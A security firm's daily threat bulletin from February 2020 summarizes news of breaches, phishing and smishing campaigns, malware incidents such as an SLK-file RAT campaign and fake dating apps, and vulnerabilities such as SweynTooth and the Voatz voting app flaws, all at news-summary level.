APT Cyber Security Malware Phishing Ransomware

CloudSEK Daily Threat Bulletin – 17th February 2020

Round Up of Major Breaches and Scams

Twitter accounts Olympics, IOC, and FC Barcelona hacked

Adding to the growing list of hacked Twitter accounts, are the Olympics’, International Olympic Committee’s (IOC) and Spanish soccer club FC Barcelona’s accounts. Twitter announced that the accounts were hacked through a 3rd party platform. They have locked the compromised accounts temporarily, while they investigates the issue.

200+ phishing pages target customers of major banks

In an attempt to steal banking credentials, threat actors have created 200+ phishing pages that impersonate major banks such as Scotiabank, CIBC, RBC, UNI, HSBC, Tangerine, TD, Meridian, Laurentian, Manulife, BNC, and Chase. The layout and sizing of the pages are tailored for mobile phones. The threat actors send automated messages, through an SMS tool, to lure victims to the phishing pages. Victims of the scam are spread across the world, as seen from the thousands of unique IPs the links were accessed from.

Coronavirus scams continue to spread misinformation in South Korea

South Korean government warns of growing smishing scams — fraudulent text message used to spread misinformation about the novel coronavirus outbreak. So far, 9,688 texts and 165 calls have been reported. While the texts claim to provide free masks, the calls use fake numbers and pretend to be health authorities, to scam people for money and information. The government will work with telcos, to thwart such phishing attempts, by deleting the numbers used to conduct the scams.

7,992 breaches across 10 Canadian entities compromises data of 144,000 people

In the last 2 years, 7,992 breaches, across 10 Canadian government entities compromised the personal information of 144,000 individuals. The breaches have been attributed to misdirected mails, security incidents, and employee misconduct. With 3,020 breaches, that involved the details of 59,065 individuals, the Canadian Revenue Agency was the worst affected.

UK’s Redcar Council goes offline after cyber-attack

Redcar and Cleveland Borough Council’s systems were attacked on Saturday. Since then, over 135,000 residents, have not had access to online public services, including online appointment bookings, planning documents and social care advice. Although it appears to be a ransomware attack, the council has not confirmed it yet. As per initial assessments, no confidential data has been stolen.

PhotoSquared app exposes personal data of 100,000 users

Popular photo app PhotoSquared has exposed personal data of its 100,000 users. The data, which had been stored on an unsecured AWS S3 bucket, was exposed on the internet. The leaked data included full names, home addresses, photos, shipping labels, and order records amounting to 94.7GB of data.

IOTA cryptocurrency hack results in severe losses for users

IOTA cryptocurrency shut down its networks after hackers exploited a vulnerability in Trinity, their mobile and desktop wallet app, to steal user funds. Within 25 minutes of identifying the hack, IOTA shut down “Coordinator,” a node in its network that provides final approval for any transaction. IOTA has confirmed that hackers mainly targeted 10 big accounts. While they haven’t confirmed the amount stolen, open-source reports say it could be as much as $1.6 million worth IOTA coins. Since the attack came to light on 12th February 2020, IOTA’s price has fallen from $0.35 to $0.29 per coin.

Breach in partner’s network exposes 1.7 million Nedbank customers’ details

One of South Africa’s biggest banks Nedbank, announced that a vulnerability in one of its partner’s networks,gave attackers access to the personal details of 1.7 million of its past and current customers. The partner, who runs the banks marketing and promotional campaigns, had a copy of the banks’ customer details, including names, ID numbers, addresses, phone numbers and email addresses. The breach came to light during a routine monitoring of the partner’s network.

French plastic surgery tech firm NextMotion, exposes patient details

An improperly secured S3 bucket, that was used by French plastic surgery tech firm NextMotion, to store plastic surgery patient’s data, has been exposed. The company, which provides imaging and patient management services, had stores ~900,000 sensitive images, videos and treatment related details, on the exposed S3 bucket. While the company has denied that the databased had Personally Identifiable Information (PII) of patients, researchers believe otherwise. While the vulnerability has been addressed, it has to be noted that, a data leak of this magnitude could be used to orchestrate scams and online attacks.

Round Up of Major Malware and Ransomware Incidents

Attackers use phishing emails to launch malware attacks on 13 major companies

In an attempt to gain access to corporate networks, threat actors have launched phishing attacks, targeting 13 companies including Glad and Hasbro. The attack begins with phishing emails that pretend to be from a vendor or client of the company. SLK (Symbolic Link) files, which are used to share data between Excel spreadsheets, are attached to the emails. When the receiver opens the file, and ‘Enables Content,’ the SLK file is executed. This launches an MSI file stored in a remote site and installs NetSupport Manager RAT. This gives the threat actor access to the company’s network to install ransomware, steal data, and perform BEC scams.

Hamas militants trick Israeli soldiers into installing malware

In what appears to be the handiwork of APT-C-23, Hamas militants, posing as teenage girls, got Israeli soldiers to install malware-infected apps on their phones. The Hamas militants first created fake social media profiles and engaged with Israeli soldiers. With the promise of sharing more photos, they lured them to install chat apps named Catch & See, Grixy, and Zatu. After installation, the app appears to crash and delete itself from the soldier’s phone, while still running in the background. It then steals photos, messages, contacts, geolocation, and even installs other malware. The malware has been removed and the hosting Hamas infrastructure has been taken down.

Round Up of Major Vulnerabilities and Patches

Microsoft recalls security update that affects Windows 10 PCs

A security update KB4524244, that was part of Microsoft’s February Patch Tuesday, has been recalled after users reported issues affecting some Windows 10 PCs. It was an updated for a security vulnerability affecting third-party Unified Extensible Firmware Interface (UEFI) boot managers. A related update, KB4502496, that addressed the same issue for other versions of Windows, has also been recalled. Microsoft has recommended that users facing issues should uninstall the update, while they continue to work on an improved version that will be released in the future.

SweynTooth bugs have major impact on devices using Bluetooth LE protocol

12 bugs, named SweynTooth, that impact devices running the Bluetooth Low Energy (BLE) protocol, have been reported. While 6 system-on-a-chip (SoC) vendors (Texas Instruments, NXP, Cypress, Dialog Semiconductors, Microchip, STMicroelectronics, and Telink Semiconductor), affected by these vulnerabilities, have been identified, it is believed that there are more vendors who have been impacted. The flaw affects over 480 end-user products including FitBit, Samsung, and Xiaomi. While the vulnerabilities can’t be exploited over the internet, and needs physical proximity to exploit, it could potentially be used to crash devices, force them into a frozen state and allow hackers to take control.

OpenSSH 8.2 adds second layer of authentication

With the recently released OpenSSH 8.2, users can configure a hardware security key when authenticating via SSH on a remote server. So, when users log into a server, they have to present a FIDO/U2F-based USB, Bluetooth, or NFC-based security key as a second proof, apart from their username and password. This is an effort to block hacking efforts that attempt to gain control over servers.

MIT finds vulnerabilities in mobile voting app Voatz

MIT researchers have identified several security related vulnerabilities in the voting app Voatz. The app, which was used in West Virginia during the 2018 midterm elections, was set to be used for the 2020 elections as well. The security flaws could allow threat actors to alter, stop, or expose a user’s vote. It also has a side channel through which attackers could potentially recover a user’s secret ballot.



Leave a Reply

Your email address will not be published. Required fields are marked *